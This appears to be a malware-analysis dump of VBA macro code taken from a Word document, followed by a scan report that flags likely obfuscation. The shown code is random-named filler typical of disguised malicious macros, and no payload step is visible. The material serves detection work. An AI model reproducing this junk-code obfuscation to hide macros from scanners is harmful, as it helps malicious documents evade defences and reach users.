YpNSadIIwrU = UCase(328579)
BWPjymYu = Right(855887, 2)
sAiYhISSkXX = RTrim(689184)
QoJHB = 45 - 43 - 98 - 75 - 74 - 21
BQwPso = 45 - 7 - 0 - 97
Rrqksfcb = 73 - 63 - 53 - 46
For otNRQU = 0 To 5
zGmoD = Right(2056912958030#, 3)
zHufIggwI = Right(994423564000432#, 5)
Rrqksfcb = RTrim(5483688)
Next otNRQU
KhiQaip = RTrim(190602815)
BWPjymYu = LTrim(77672044)
BWPjymYu = 51 + 89 + 26 + 98
ksEESrvQ = LTrim(88243)
QoJHB = StrReverse(994604406)
ksEESrvQ = StrReverse(923353)
fYJGUC = "GOcPLNYPIFnfAypbPvId"
End Function
Attribute VB_Name = "Module12"
Function LcsOBd(oiKVXD As String, sjwrOyl As String, RGRueow As Double) As String
BWPjymYu = Left(2501172331092#, 3)
UvMzrbZJsmA = StrReverse(45838772752#)
LEBseY = LTrim(42212)
kEbLvCjbr = UCase(549519490169#)
zGmoD = Left(253323, 4)
YpNSadIIwrU = 40 - 49 - 100 - 53 - 21
BQwPso = Right(474643, 5)
sAiYhISSkXX = UCase(756443222)
lFeAHsjz = 44 - 78
zHufIggwI = RTrim(43004515)
QoJHB = LTrim(77384)
KhiQaip = RTrim(73894539519#)
qwHslJuRI = Right(514516470, 5)
KhiQaip = Left(5631748409#, 3)
DwnpOKVNxQST = StrReverse(297108055303#)
bIBcHTLDIwb = LTrim(146939293383278#)
QoJHB = Right(61854, 3)
lqWjUyQs = Space(5)
KMFjiVDKrZ = RTrim(6865189208219#)
bIBcHTLDIwb = RTrim(4423259060#)
LcsOBd = "feugYPaTocAaGfukUtoi"
End Function
Sub wzqGKQ(CgqEXHX As Boolean, wXiqGfZ As Double)
WgqfTITOHxn = Space(8)
lqWjUyQs = Left(6177316665#, 3)
UvMzrbZJsmA = UCase(9059117)
tkbyI = Left(91868127, 5)
kEbLvCjbr = LTrim(988070)
KMFjiVDKrZ = UCase(93145418)
QhYkIS = StrReverse(1207476604)
KMFjiVDKrZ = 49 + 62 + 21
NMBjfWDGCD = Left(65282769121623#, 5)
BWPjymYu = LTrim(660779)
UvMzrbZJsmA = Space(16)
LEBseY = Left(5868514933#, 4)
zHufIggwI = StrReverse(426267335)
bIBcHTLDIwb = UCase(4663709434287#)
LEBseY = StrReverse(521826)
End Sub
Function TmvfOt(KvCIoI As String, PzYwNjT As Boolean, PvqBoO As Double) As String
For cOysrk = 0 To 4
While uBWZSZ < 1
zHufIggwI = LTrim(84557324000395#)
tkbyI = Left(819596242, 5)
KaQXTWKZpoJb = StrReverse(9402)
ksEESrvQ = UCase(27859174528#)
uBWZSZ = uBWZSZ + 1
Wend
KMFjiVDKrZ = RTrim(41267804316503#)
BQwPso = 71 - 34 - 36 - 1 - 96
YpNSadIIwrU = Space(3)
BQwPso = UCase(79156001156219#)
YpNSadIIwrU = Right(78232222, 3)
Next cOysrk
KMFjiVDKrZ = LTrim(96489)
KaQXTWKZpoJb = 77 - 33
LEBseY = RTrim(2082647935746#)
lqWjUyQs = UCase(778943710)
zGmoD = LTrim(76373)
LEBseY = RTrim(888410)
…

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 274432 bytes |

SHA-256: 888d05f31cf646655b3299788a07dc39996085db6e71594ad8df962728dbffd6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
994 of 1801 identifiers look randomly generated (e.g. 'JtfVnTxWEVKUSlBYNGyu') — consistent with name-mangling obfuscation.